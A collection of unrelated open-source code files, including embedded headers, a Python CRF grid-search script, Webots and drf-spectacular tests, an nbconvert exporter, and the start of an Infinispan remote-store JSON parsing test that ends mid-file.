#endif
/* The TIVA/Stellaris only supports 8 priority levels. The hardware
* priority mechanism will only look at the upper N bits of the 8-bit
* priority level (where N is 3 for the Tiva/Stellaris family), so any
* prioritization must be performed in those bits. The default priority
* level is set to the middle value
*/
#define NVIC_SYSH_PRIORITY_MIN 0xe0 /* Bits [7:5] set in minimum priority */
#define NVIC_SYSH_PRIORITY_DEFAULT 0x80 /* Midpoint is the default */
#define NVIC_SYSH_PRIORITY_MAX 0x00 /* Zero is maximum priority */
#define NVIC_SYSH_PRIORITY_STEP 0x20 /* Three bits of interrupt priority used */
/****************************************************************************
* Public Types
****************************************************************************/
/****************************************************************************
* Public Data
****************************************************************************/
/****************************************************************************
* Public Function Prototypes
****************************************************************************/
#endif /* __ARCH_ARM_INCLUDE_TIVA_CHIP_H */
| 12,810 |
785 | <reponame>fossilCreek/Parserator-training_process
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
from sklearn.metrics import f1_score
from sklearn.base import BaseEstimator
from sklearn.grid_search import GridSearchCV
from training import get_data_sklearn_format
import pycrfsuite
def f1_with_flattening(estimator, X, y):
"""
Calculate F1 score by flattening the predictions of the
estimator across all sequences. For example, given the following
address sequences as input
['1 My str', '2 Your blvd'],
the predictions of the model will be flattened like so:
['AddressNumber', 'StreetName', 'StreetNamePostType', 'AddressNumber', 'StreetName', 'StreetNamePostType']
and compared to a similarly flattened gold standard labels. This calculates the overall
quality of the model across all sequences as opposed to how well it does
at any particular sequence.
:param X: list of sequences to tag
:param y: list of gold standard tuples
"""
predicted = estimator.predict(X)
flat_pred, flat_gold = [], []
for a, b in zip(predicted, y):
if len(a) == len(b):
flat_pred.extend(a)
flat_gold.extend(b)
return f1_score(flat_gold, flat_pred)
def get_data_sklearn_format(train_file_list, module):
"""
Parses the specified data files and returns it in sklearn format.
:param path:
:return: tuple of:
1) list of training sequences, each of which is a string
2) list of gold standard labels, each of which is a tuple
of strings, one for each token in the corresponding training
sequence
"""
data = list(readTrainingData(train_file_list, module.GROUP_LABEL))
random.shuffle(data)
x, y = [], []
for raw_string, components in data:
tokens, labels = zip(*components)
x.append(raw_string)
y.append(labels)
return x, y
class SequenceEstimator(BaseEstimator):
"""
A sklearn-compatible wrapper for a parser trainer
"""
def __init__(self, c1=1, c2=1, feature_minfreq=0):
"""
:param c1: L1 regularisation coefficient
:param c2: L2 regularisation coefficient
:param feature_minfreq: minimum feature frequency
:return:
"""
self.c1 = c1
self.c2 = c2
self.feature_minfreq = feature_minfreq
def fit(self, X, y, **params, model_path):
# sklearn requires parameters to be declared as fields of the estimator,
# an we can't have a full stop there. Replace with an underscore
params = {k.replace('_', '.'): v for k, v in self.__dict__.items()}
trainer = pycrfsuite.Trainer(verbose=False, params=params)
for raw_text, labels in zip(X, y):
tokens = tokenize(raw_text)
trainer.append(tokens2features(tokens), labels)
trainer.train(model_path)
reload(parserator)
def predict(self, X):
reload(parserator) # tagger object is defined at the module level, update now
predictions = []
for sequence in X:
predictions.append([foo[1] for foo in parserator.parse(sequence)])
return predictions
if __name__ == '__main__':
# refer to http://www.chokkan.org/software/crfsuite/manual.html
# for description of parameters
cv = GridSearchCV(SequenceEstimator(), {'c1': [10 ** x for x in range(-2, 2)],
'c2': [10 ** x for x in range(-2, 4)],
'feature_minfreq': [0, 3, 5]},
scoring=f1_with_flattening, verbose=5)
X, y = get_data_sklearn_format()
cv.fit(X, y)
print(cv.best_params_)
for foo in cv.grid_scores_:
print(foo)
| 1,570 |
619 | <reponame>moredu/upm<filename>examples/c++/lcdks.cxx
/*
* Author: <NAME> <<EMAIL>>
* Copyright (c) 2017 Intel Corporation.
*
* The MIT License
*
* This program and the accompanying materials are made available under the
* terms of the The MIT License which is available at
* https://opensource.org/licenses/MIT.
*
* SPDX-License-Identifier: MIT
*/
#include <iostream>
#include <signal.h>
#include "lcdks.hpp"
#include "upm_utilities.h"
using namespace std;
bool shouldRun = true;
void
sig_handler(int signo)
{
if (signo == SIGINT)
shouldRun = false;
}
int
main(int argc, char** argv)
{
signal(SIGINT, sig_handler);
//! [Interesting]
// Instantiate a LCDKS (LCD Keypad Shield) using default pins
// NOTE: The default pins do not include support for a gpio
// controlled backlight. If you need one, you will need to specify
// all neccessary pins to the constructor.
upm::LCDKS lcd;
lcd.setCursor(0, 0);
lcd.write("LCDKS driver");
lcd.setCursor(1, 2);
lcd.write("Hello World");
// output current key value every second.
while (shouldRun) {
cout << "Button value: " << lcd.getKeyValue() << endl;
upm_delay(1);
}
//! [Interesting]
return 0;
}
| 480 |
375 | /*
* Copyright 2016 Nokia Solutions and Networks
* Licensed under the Apache License, Version 2.0,
* see license.txt file for details.
*/
package org.robotframework.ide.eclipse.main.plugin.mockeclipse;
import org.eclipse.core.resources.IResource;
import org.eclipse.core.runtime.IAdaptable;
public class WrappedResource implements IAdaptable {
private final IResource resourceToWrap;
public WrappedResource(final IResource resourceToWrap) {
this.resourceToWrap = resourceToWrap;
}
@SuppressWarnings("unchecked")
@Override
public Object getAdapter(@SuppressWarnings("rawtypes") final Class adapter) {
if (adapter.isInstance(resourceToWrap)) {
return adapter.cast(resourceToWrap);
}
return null;
}
}
| 303 |
2,542 | // ------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.
// ------------------------------------------------------------
#pragma once
namespace TxnReplicator
{
class SLConfigValues :
public Common::ComponentConfig,
public SLConfigBase
{
DECLARE_COMPONENT_CONFIG(SLConfigValues, "Invalid");
SL_CONFIG_PROPERTIES(L"Invalid");
};
}
| 160 |
1,561 | <reponame>victorhu3/webots<filename>tests/api/controllers/emitter_receiver_invalid_function_call/emitter_receiver_invalid_function_call.c<gh_stars>1000+
/*
* Description: Test robustness Emitter and Receiver function calling them
* with wrong arguments.
*/
#include <webots/emitter.h>
#include <webots/receiver.h>
#include <webots/robot.h>
#include "../../../lib/ts_assertion.h"
#include "../../../lib/ts_utils.h"
#define TIME_STEP 32
#define IS_VERBOSE 0
void sendLog(const char *text) {
if (IS_VERBOSE != 0)
printf("%s\n", text);
}
int main(int argc, char **argv) {
ts_setup(argv[1]);
WbDeviceTag emitter = 0;
WbDeviceTag receiver = 0;
WbDeviceTag otherDevice = 0;
int queueLength, i;
double d;
const char *buffer;
const double *doubleArray;
// messages
const char *msgString0 = "Hello";
if (strcmp(wb_robot_get_name(), "robot_emitter") == 0) {
emitter = wb_robot_get_device("emitter"); // radio, channel 2
otherDevice = wb_robot_get_device("receiver");
} else if (strcmp(wb_robot_get_name(), "robot_receiver") == 0) {
receiver = wb_robot_get_device("receiver"); // radio, channel -1
otherDevice = wb_robot_get_device("gps");
}
i = wb_receiver_get_sampling_period(receiver);
ts_assert_int_equal(i, 0, "Get sampling period of a disabled receiver should return 0 not %d", i);
wb_robot_step(TIME_STEP);
// TEST 1: enable/disable invalid receiver
if (receiver) {
wb_receiver_enable(receiver, TIME_STEP + 5);
i = wb_receiver_get_sampling_period(receiver);
ts_assert_int_equal(i, TIME_STEP + 5, "Get sampling period of a just enabled receiver should return %d not %d",
TIME_STEP + 5, i);
sendLog("Enable NULL receiver");
wb_receiver_enable(0, TIME_STEP);
i = wb_receiver_get_sampling_period(0);
ts_assert_int_equal(i, 0, "Get sampling period of a NULL receiver should return %d not %d", 0, TIME_STEP);
sendLog("Disable NULL receiver");
wb_receiver_disable(0);
sendLog("Enable an invalid receiver");
wb_receiver_enable(otherDevice, TIME_STEP);
i = wb_receiver_get_sampling_period(otherDevice);
ts_assert_int_equal(i, 0, "Get sampling period of an invalid receiver should return %d not %d", 0, TIME_STEP);
sendLog("Disable an invalid receiver");
wb_receiver_disable(otherDevice);
wb_robot_step(TIME_STEP);
sendLog("Enable an already enabled receiver with different sampling period");
wb_receiver_enable(receiver, TIME_STEP);
i = wb_receiver_get_sampling_period(receiver);
ts_assert_int_equal(i, TIME_STEP, "Get sampling period of an already enabled receiver should be changed to %d not %d",
TIME_STEP, i);
wb_robot_step(TIME_STEP);
sendLog("Enable an already enabled receiver with sampling period < 0");
wb_receiver_enable(receiver, -7);
i = wb_receiver_get_sampling_period(receiver);
ts_assert_int_equal(i, TIME_STEP,
"Get sampling period of an enabled receiver should be %d not %d: sampling period < 0 is not valid",
TIME_STEP, i);
} else if (emitter) {
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
}
// TEST 2: send message on invalid emitter
wb_robot_step(TIME_STEP);
if (receiver) {
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
i = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(i, 0, "Receiver should receive 0 not %d packets when send from a NULL emitter", i);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
i = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(i, 0, "Receiver should receive 0 not %d packets when send from an invalid emitter", i);
} else if (emitter) {
sendLog("Send data from a NULL emitter");
wb_emitter_send(0, msgString0, strlen(msgString0) + 1);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Send data from an invalid emitter");
wb_emitter_send(otherDevice, msgString0, strlen(msgString0) + 1);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
}
// TEST 3: send NULL message on valid emitter
wb_robot_step(TIME_STEP);
if (receiver) {
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
i = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(i, 0, "Receiver should receive 0 not %d packets when NULL data is sent", i);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
// TODO
i = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(i, 0, "Receiver should receive 0 not %d packets when data with wrong size is sent", i);
/*buffer = wb_receiver_get_data(receiver);
ts_assert_string_equal(buffer, "He",
"Receiver should receive data \"%s\" not \"%s\" when data with wrong size is sent", "He", buffer);
wb_receiver_next_packet(receiver);
*/
} else if (emitter) {
sendLog("Send NULL data from a valid emitter");
wb_emitter_send(emitter, NULL, strlen(msgString0) + 1);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Send data with wrong size from a avalid emitter");
wb_emitter_send(otherDevice, msgString0, strlen(msgString0) - 3);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
}
// TEST 4: set/get channel on invalid device
if (receiver) {
sendLog("Set channel with NULL receiver");
wb_receiver_set_channel(0, 5);
sendLog("Get channel of a NULL receiver");
i = wb_receiver_get_channel(0);
ts_assert_int_equal(i, -1, "Get channel of a NULL receiver should return %d not %d", -1, i);
sendLog("Set channel with invalid receiver");
wb_receiver_set_channel(otherDevice, 5);
sendLog("Get channel of an invalid receiver");
i = wb_receiver_get_channel(otherDevice);
ts_assert_int_equal(i, -1, "Get channel of an invalid receiver should return %d not %d", -1, i);
wb_receiver_disable(receiver);
wb_robot_step(TIME_STEP);
sendLog("Set channel of a disabled receiver");
wb_receiver_set_channel(receiver, 7);
i = wb_receiver_get_channel(receiver);
ts_assert_int_equal(i, 7, "Setting the channel of a disabled receiver should possible, channel should be %d not %d", 7, i);
wb_receiver_enable(receiver, TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Set channel of a valid receiver to a negative value");
wb_receiver_set_channel(receiver, -5);
i = wb_receiver_get_channel(receiver);
ts_assert_int_equal(
i, 7, "Setting the channel of a receiver to a negative value should not be possible, channel should be %d not %d", 7, i);
} else if (emitter) {
sendLog("Set channel with NULL emitter");
wb_emitter_set_channel(0, 5);
sendLog("Get channel of a NULL emitter");
i = wb_emitter_get_channel(0);
ts_assert_int_equal(i, -1, "Get channel of a NULL emitter should return %d not %d", -1, i);
sendLog("Set channel with invalid emitter");
wb_emitter_set_channel(otherDevice, 5);
sendLog("Get channel of an invalid emitter");
i = wb_emitter_get_channel(otherDevice);
ts_assert_int_equal(i, -1, "Get channel of an invalid emitter should return %d not %d", -1, i);
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Set channel of a valid emitter to a negative value");
wb_emitter_set_channel(emitter, -5);
i = wb_emitter_get_channel(emitter);
ts_assert_int_equal(
i, 2, "Setting the channel of an emitter to a negative value should not be possible, channel should be should %d not %d",
2, i);
}
wb_robot_step(TIME_STEP);
if (receiver) {
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
} else if (emitter) {
// TEST 5: set/get range on invalid emitter
sendLog("Set range with NULL emitter");
wb_emitter_set_range(0, 0.33);
sendLog("Get range of a NULL emitter");
d = wb_emitter_get_range(0);
ts_assert_double_equal(d, NAN, "Get range of a NULL emitter should return NAN not %f", d);
wb_robot_step(TIME_STEP);
sendLog("Set range with invalid emitter");
wb_emitter_set_range(otherDevice, 0.33);
sendLog("Get range of an invalid emitter");
d = wb_emitter_get_range(otherDevice);
ts_assert_double_equal(d, NAN, "Get range of an invalid emitter should return NAN not %f", d);
sendLog("Set range of a valid emitter to a negative value");
wb_emitter_set_range(emitter, -0.33);
d = wb_emitter_get_range(emitter);
ts_assert_double_equal(
d, 0.8, "Setting the range of an emitter to a negative value should not be possible, range should be should %d not %f",
0.8, d);
// TEST 6: get buffer size on invalid emitter
wb_robot_step(TIME_STEP);
sendLog("Get buffer size of a NULL emitter");
i = wb_emitter_get_buffer_size(0);
ts_assert_int_equal(i, -1, "Get buffer size of a NULL emitter should return -1 not %d", i);
sendLog("Get buffer size of an invalid emitter");
i = wb_emitter_get_buffer_size(otherDevice);
ts_assert_int_equal(i, -1, "Get buffer size of an invalid emitter should return -1 not %d", i);
ts_send_success();
return EXIT_SUCCESS;
}
// ONLY receiver
// TEST 6: get queue_legnth on invalid receiver
wb_robot_step(TIME_STEP);
sendLog("Get queue length of a NULL receiver");
queueLength = wb_receiver_get_queue_length(0);
ts_assert_int_equal(queueLength, -1, "Get queue length of a NULL emitter should return -1 not %d", queueLength);
sendLog("Get queue length of an invalid receiver");
queueLength = wb_receiver_get_queue_length(otherDevice);
ts_assert_int_equal(queueLength, -1, "Get queue length of an invalid emitter should return -1 not %d", queueLength);
wb_receiver_disable(receiver);
wb_robot_step(TIME_STEP);
sendLog("Get queue length of a disabled receiver");
queueLength = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(queueLength, 0, "Get queue length of a disabled emitter should return 0 not %d", queueLength);
// TEST 7: call next packet on invalid receiver
wb_robot_step(TIME_STEP);
wb_receiver_disable(receiver);
wb_robot_step(TIME_STEP);
sendLog("Call next packet of a NULL receiver");
wb_receiver_next_packet(0);
sendLog("Call next packet of an invalid receiver");
wb_receiver_next_packet(otherDevice);
sendLog("Call next packet of a disabled receiver with empty reception list");
wb_receiver_next_packet(receiver);
wb_receiver_enable(receiver, TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Call next packet of an enabled receiver with empty reception list");
wb_receiver_next_packet(receiver);
// TEST 8: get data anda data size on invalid receiver
wb_robot_step(TIME_STEP);
wb_receiver_disable(receiver);
wb_robot_step(TIME_STEP);
sendLog("Get data of a NULL receiver");
buffer = wb_receiver_get_data(0);
ts_assert_pointer_null((void *)buffer, "Get data of a NULL receiver should return NULL not \"%s\"", buffer);
sendLog("Get data size of a NULL receiver");
i = wb_receiver_get_data_size(0);
ts_assert_int_equal(i, -1, "Get data size of a NULL receiver should return -1 not %d", i);
sendLog("Get data of an invalid receiver");
buffer = wb_receiver_get_data(otherDevice);
ts_assert_pointer_null((void *)buffer, "Get data of an invalid receiver should return NULL not \"%s\"", buffer);
sendLog("Get data size of an invalid receiver");
i = wb_receiver_get_data_size(otherDevice);
ts_assert_int_equal(i, -1, "Get data size of an invalid receiver should return -1 not %d", i);
sendLog("Get data of a disabled receiver with empty reception list");
buffer = wb_receiver_get_data(receiver);
ts_assert_pointer_null((void *)buffer, "Get data of an invalid receiver should return NULL not \"%s\"", buffer);
sendLog("Get data size of a disabled receiver with empty reception list");
i = wb_receiver_get_data_size(receiver);
ts_assert_int_equal(i, -1, "Get data size of a disabled receiver with empty reception list should return -1 not %d", i);
wb_receiver_enable(receiver, TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Get data of a valid receiver with empty reception list");
buffer = wb_receiver_get_data(receiver);
ts_assert_pointer_null((void *)buffer, "Get data of a valid receiver with empty reception list should return NULL not \"%s\"",
buffer);
sendLog("Get data size of a valid receiver with empty reception list");
i = wb_receiver_get_data_size(receiver);
ts_assert_int_equal(i, -1, "Get data size of a valid receiver with empty reception list should return -1 not %d", i);
// TEST 9: get signal strength on invalid receiver
wb_robot_step(TIME_STEP);
wb_receiver_disable(receiver);
wb_robot_step(TIME_STEP);
sendLog("Get signal strength of a NULL receiver");
d = wb_receiver_get_signal_strength(0);
ts_assert_double_equal(d, NAN, "Get signal strength of a NULL receiver should return NAN not %f", d);
sendLog("Get signal strength of an invalid receiver");
d = wb_receiver_get_signal_strength(otherDevice);
ts_assert_double_equal(d, NAN, "Get signal strength of an invalid receiver should return NAN not %f", d);
sendLog("Get signal strength of a disabled receiver with empty reception list");
d = wb_receiver_get_signal_strength(receiver);
ts_assert_double_equal(d, NAN, "Get signal strength of an invalid receiver should return NAN not %f", d);
wb_receiver_enable(receiver, TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Get signal strength of a valid receiver with empty reception list");
d = wb_receiver_get_queue_length(receiver);
ts_assert_int_equal(d, 0, "Get signal strength of a valid receiver with empty reception list should return 0 not %f", d);
// TEST 10: get emitter direction on invalid receiver
wb_robot_step(TIME_STEP);
sendLog("Get emitter direction of a NULL receiver");
doubleArray = wb_receiver_get_emitter_direction(0);
ts_assert_pointer_null((void *)doubleArray, "Get emitter direction of a NULL emitter should return NULL");
sendLog("Get emitter direction of an invalid receiver");
doubleArray = wb_receiver_get_emitter_direction(otherDevice);
ts_assert_pointer_null((void *)doubleArray, "Get emitter direction of an invalid emitter should return NULL");
sendLog("Get emitter direction of a disabled receiver with empty reception list");
doubleArray = wb_receiver_get_emitter_direction(receiver);
ts_assert_pointer_null((void *)doubleArray, "Get emitter direction of an invalid receiver should return NULL");
wb_receiver_enable(receiver, TIME_STEP);
wb_robot_step(TIME_STEP);
sendLog("Get emitter direction of a valid receiver with empty reception list");
doubleArray = wb_receiver_get_emitter_direction(receiver);
ts_assert_pointer_null((void *)doubleArray,
"Get emitter direction of a valid receiver with empty reception list should return NULL");
ts_send_success();
return EXIT_SUCCESS;
}
| 5,444 |
1,025 | import functools
import json
import sys
import tempfile
import uuid
from datetime import timedelta
from decimal import Decimal
from typing import Optional
import pytest
from django import __version__ as DJANGO_VERSION
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.urls import reverse
from django.utils.functional import cached_property
from rest_framework import serializers, viewsets
from rest_framework.routers import SimpleRouter
from rest_framework.test import APIClient
from drf_spectacular.generators import SchemaGenerator
from tests import assert_equal, assert_schema, build_absolute_file_path
if sys.version_info >= (3, 8):
functools_cached_property = functools.cached_property
else:
# We re-use Django's cached_property when it's not avaiable to
# keep tests unified across Python versions.
functools_cached_property = cached_property
fs = FileSystemStorage(location=tempfile.gettempdir())
class Aux(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
field_foreign = models.ForeignKey('Aux', null=True, on_delete=models.CASCADE)
class AuxSerializer(serializers.ModelSerializer):
""" description for aux object """
class Meta:
fields = '__all__'
model = Aux
class SubObject:
def __init__(self, instance):
self._instance = instance
@property
def calculated(self) -> int:
return self._instance.field_int
@property
def nested(self) -> 'SubObject':
return self
@property
def model_instance(self) -> 'AllFields':
return self._instance
@property
def optional_int(self) -> Optional[int]:
return 1
class AllFields(models.Model):
# basics
field_int = models.IntegerField()
field_float = models.FloatField()
field_bool = models.BooleanField()
field_char = models.CharField(max_length=100)
field_text = models.TextField(verbose_name='a text field')
# special
field_slug = models.SlugField()
field_email = models.EmailField()
field_uuid = models.UUIDField()
field_url = models.URLField()
field_ip_generic = models.GenericIPAddressField(protocol='ipv6')
field_decimal = models.DecimalField(max_digits=6, decimal_places=3)
field_file = models.FileField(storage=fs)
field_img = models.ImageField(storage=fs)
field_date = models.DateField()
field_datetime = models.DateTimeField()
field_bigint = models.BigIntegerField()
field_smallint = models.SmallIntegerField()
field_posint = models.PositiveIntegerField()
field_possmallint = models.PositiveSmallIntegerField()
if DJANGO_VERSION > '3.1':
field_nullbool = models.BooleanField(null=True)
else:
field_nullbool = models.NullBooleanField() # type: ignore
field_time = models.TimeField()
field_duration = models.DurationField()
field_binary = models.BinaryField()
# relations
field_foreign = models.ForeignKey(
Aux, on_delete=models.CASCADE, help_text='main aux object', related_name='ff'
)
field_m2m = models.ManyToManyField(
Aux, help_text='set of related aux objects', related_name='fm'
)
field_o2o = models.OneToOneField(
Aux, on_delete=models.CASCADE, help_text='bound aux object', related_name='fo'
)
# overrides
field_regex = models.CharField(max_length=50)
field_bool_override = models.BooleanField()
if DJANGO_VERSION >= '3.1':
field_json = models.JSONField()
else:
@property
def field_json(self):
return {'A': 1, 'B': 2}
@property
def field_model_property_float(self) -> float:
return 1.337
@cached_property
def field_model_cached_property_float(self) -> float:
return 1.337
@functools_cached_property
def field_model_py_cached_property_float(self) -> float:
return 1.337
@property
def field_list(self):
return [1.1, 2.2, 3.3]
@property
def field_list_object(self):
return self.field_m2m.all()
def model_function_basic(self) -> bool:
return True
def model_function_model(self) -> Aux:
return self.field_foreign
@property
def sub_object(self) -> SubObject:
return SubObject(self)
@cached_property
def sub_object_cached(self) -> SubObject:
return SubObject(self)
@functools_cached_property
def sub_object_py_cached(self) -> SubObject:
return SubObject(self)
@property
def optional_sub_object(self) -> Optional[SubObject]:
return SubObject(self)
class AllFieldsSerializer(serializers.ModelSerializer):
field_decimal_uncoerced = serializers.DecimalField(
source='field_decimal',
max_digits=6,
decimal_places=3,
coerce_to_string=False
)
field_method_float = serializers.SerializerMethodField()
def get_field_method_float(self, obj) -> float:
return 1.3456
field_method_object = serializers.SerializerMethodField()
def get_field_method_object(self, obj) -> dict:
return {'key': 'value'}
field_regex = serializers.RegexField(r'^[a-zA-z0-9]{10}\-[a-z]', label='A regex field')
field_hidden = serializers.HiddenField(default='')
# composite fields
field_list = serializers.ListField(
child=serializers.FloatField(), min_length=3, max_length=100,
)
field_list_serializer = serializers.ListField(
child=AuxSerializer(),
source='field_list_object',
)
# extra related fields
field_related_slug = serializers.SlugRelatedField(
read_only=True, source='field_foreign', slug_field='id'
) # type: ignore
field_related_string = serializers.StringRelatedField(
source='field_foreign'
) # type: ignore
field_related_hyperlink = serializers.HyperlinkedRelatedField(
read_only=True, source='field_foreign', view_name='aux-detail'
) # type: ignore
field_identity_hyperlink = serializers.HyperlinkedIdentityField(
read_only=True, view_name='allfields-detail'
)
# read only - model traversal
field_read_only_nav_uuid = serializers.ReadOnlyField(source='field_foreign.id')
field_read_only_nav_uuid_3steps = serializers.ReadOnlyField(
source='field_foreign.field_foreign.field_foreign.id',
allow_null=True, # force field output even if traversal fails
)
field_read_only_model_function_basic = serializers.ReadOnlyField(source='model_function_basic')
field_read_only_model_function_model = serializers.ReadOnlyField(source='model_function_model.id')
# override default writable bool field with readonly
field_bool_override = serializers.ReadOnlyField()
field_model_property_float = serializers.ReadOnlyField()
field_model_cached_property_float = serializers.ReadOnlyField()
field_model_py_cached_property_float = serializers.ReadOnlyField()
field_dict_int = serializers.DictField(
child=serializers.IntegerField(),
source='field_json',
)
# there is a JSON model field for django>=3.1 that would be placed automatically. for <=3.1 we
# need to set the field explicitly. defined here for both cases to have consistent ordering.
field_json = serializers.JSONField()
# traversal of non-model types of complex object
field_sub_object_calculated = serializers.ReadOnlyField(source='sub_object.calculated')
field_sub_object_nested_calculated = serializers.ReadOnlyField(source='sub_object.nested.calculated')
field_sub_object_model_int = serializers.ReadOnlyField(source='sub_object.model_instance.field_int')
field_sub_object_cached_calculated = serializers.ReadOnlyField(source='sub_object_cached.calculated')
field_sub_object_cached_nested_calculated = serializers.ReadOnlyField(source='sub_object_cached.nested.calculated')
field_sub_object_cached_model_int = serializers.ReadOnlyField(source='sub_object_cached.model_instance.field_int')
field_sub_object_py_cached_calculated = serializers.ReadOnlyField(source='sub_object_py_cached.calculated')
field_sub_object_py_cached_nested_calculated = serializers.ReadOnlyField(
source='sub_object_py_cached.nested.calculated',
)
field_sub_object_py_cached_model_int = serializers.ReadOnlyField(
source='sub_object_py_cached.model_instance.field_int',
)
# typing.Optional
field_optional_sub_object_calculated = serializers.ReadOnlyField(
source='optional_sub_object.calculated',
allow_null=True,
)
field_sub_object_optional_int = serializers.ReadOnlyField(
source='sub_object.optional_int',
allow_null=True,
)
class Meta:
fields = '__all__'
model = AllFields
class AllFieldsModelViewset(viewsets.ReadOnlyModelViewSet):
serializer_class = AllFieldsSerializer
queryset = AllFields.objects.all()
def retrieve(self, request, *args, **kwargs):
return super().retrieve(request, *args, **kwargs)
class AuxModelViewset(viewsets.ReadOnlyModelViewSet):
serializer_class = AuxSerializer
queryset = Aux.objects.all()
router = SimpleRouter()
router.register('allfields', AllFieldsModelViewset)
router.register('aux', AuxModelViewset)
urlpatterns = router.urls
@pytest.mark.urls(__name__)
def test_fields(no_warnings):
assert_schema(
SchemaGenerator().get_schema(request=None, public=True),
'tests/test_fields.yml'
)
@pytest.mark.urls(__name__)
@pytest.mark.django_db
def test_model_setup_is_valid():
aux = Aux(id='0ac6930d-87f4-40e8-8242-10a3ed31a335')
aux.save()
m = AllFields(
# basics
field_int=1,
field_float=1.25,
field_bool=True,
field_char='char',
field_text='text',
# special
field_slug='all_fields',
field_email='<EMAIL>',
field_uuid='00000000-00000000-00000000-00000000',
field_url='https://github.com/tfranzel/drf-spectacular',
field_ip_generic='2001:db8::8a2e:370:7334',
field_decimal=Decimal('666.333'),
field_file=None,
field_img=None, # TODO fill with data below
field_date='2021-09-09',
field_datetime='2021-09-09T10:15:26.049862',
field_bigint=11111111111111,
field_smallint=111111,
field_posint=123,
field_possmallint=1,
field_nullbool=None,
field_time='00:05:23.283',
field_duration=timedelta(seconds=10),
field_binary=b'\xce\x9c\xce\xb9\xce\xb1',
# relations
field_foreign=aux,
field_o2o=aux,
# overrides
field_regex='12345asdfg-a',
field_bool_override=True,
)
if DJANGO_VERSION >= '3.1':
m.field_json = {'A': 1, 'B': 2}
m.field_file.save('hello.txt', ContentFile("hello world"), save=True)
m.save()
m.field_m2m.add(aux)
response = APIClient().get(reverse('allfields-detail', args=(m.pk,)))
assert response.status_code == 200
with open(build_absolute_file_path('tests/test_fields_response.json')) as fh:
expected = json.load(fh)
if DJANGO_VERSION < '3':
expected['field_file'] = f'http://testserver/allfields/1/{m.field_file.name}'
else:
expected['field_file'] = f'http://testserver/{m.field_file.name}'
assert_equal(json.loads(response.content), expected)
| 4,478 |
476 | """Ansible tasks Exporter class"""
import os
from traitlets import default
from nbconvert.exporters.templateexporter import TemplateExporter
class AnsibleTasksExporter(TemplateExporter):
"""
Exports an Ansible tasks file.
"""
export_from_notebook = "Ansible Tasks"
output_mimetype = 'text/yml'
@default('file_extension')
def _file_extension_default(self):
return '.yaml'
@default('template_file')
def _template_file_default(self):
return 'ansible_tasks.tpl'
@property
def template_path(self):
return super(AnsibleTasksExporter, self).template_path + [os.path.join(os.path.dirname(os.path.dirname(__file__)), "templates")]
| 268 |
488 | <filename>projects/SATIrE/src/pig/yystype.h
// Copyright 2005,2006,2007 <NAME>, <NAME>
// $Id: yystype.h,v 1.2 2007-03-08 15:36:49 markus Exp $
#ifndef H_YYSTYPE
#define H_YYSTYPE
#include <vector>
#include "spec.h"
#include "Rule.h"
union yystype
{
struct isn idstrnum;
std::vector<struct isn> *idstrlist;
const char *code;
std::vector<Rule *> *rules;
bool extern_c;
bool per_constructor;
bool islist;
bool macro;
};
typedef union yystype YYSTYPE;
extern YYSTYPE piglval;
#define YYSTYPE_IS_DECLARED
#endif
| 254 |
713 | package org.infinispan.persistence.remote.configuration;
import static org.testng.AssertJUnit.assertEquals;
import static org.testng.AssertJUnit.assertFalse;
import static org.testng.AssertJUnit.assertNotNull;
import static org.testng.AssertJUnit.assertTrue;
import java.io.IOException;
import java.util.List;
import org.infinispan.client.hotrod.ProtocolVersion;
import org.infinispan.commons.dataconversion.internal.Json;
import org.infinispan.commons.util.TypedProperties;
import org.infinispan.configuration.cache.ConfigurationBuilder;
import org.infinispan.persistence.remote.upgrade.SerializationUtils;
import org.testng.annotations.Test;
/**
* Test parsing of a JSON document containing only a remote-store config
*
* @since 13.0
*/
@Test(groups = "unit", testName = "persistence.remote.configuration.JsonRemoteStoreOnlyParsingTest")
public class JsonRemoteStoreOnlyParsingTest {
@Test
public void testJsonParsing() throws IOException {
String json = "{\n" +
" \"remote-store\":{\n" +
" \"cache\":\"ccc\",\n" +
" \"shared\":true,\n" +
" \"read-only\":false,\n" +
" \"hotrod-wrapping\":false,\n" +
" \"raw-values\":false,\n" +
" \"socket-timeout\":60000,\n" +
" \"protocol-version\":\"2.8\",\n" +
" \"remote-server\":[\n" +
" {\n" +
" \"host\":\"127.0.0.2\",\n" +
" \"port\":12222\n" +
" }\n" +
" ],\n" +
" \"connection-pool\":{\n" +
" \"max-active\":110,\n" +
" \"exhausted-action\":\"CREATE_NEW\"\n" +
" },\n" +
" \"async-executor\":{\n" +
" \"properties\":{\n" +
" \"name\":4\n" +
" }\n" +
" },\n" +
" \"properties\":{\n" +
" \"key\":\"value\"\n" +
" },\n" +
" \"security\":{\n" +
" \"authentication\":{\n" +
" \"server-name\":\"servername\",\n" +
" \"digest\":{\n" +
" \"username\":\"username\",\n" +
" \"password\":\"password\",\n" +
" \"realm\":\"realm\"\n" +
" }\n" +
" },\n" +
" \"encryption\":{\n" +
" \"protocol\":\"TLSv1.2\",\n" +
" \"sni-hostname\":\"snihostname\",\n" +
" \"keystore\":{\n" +
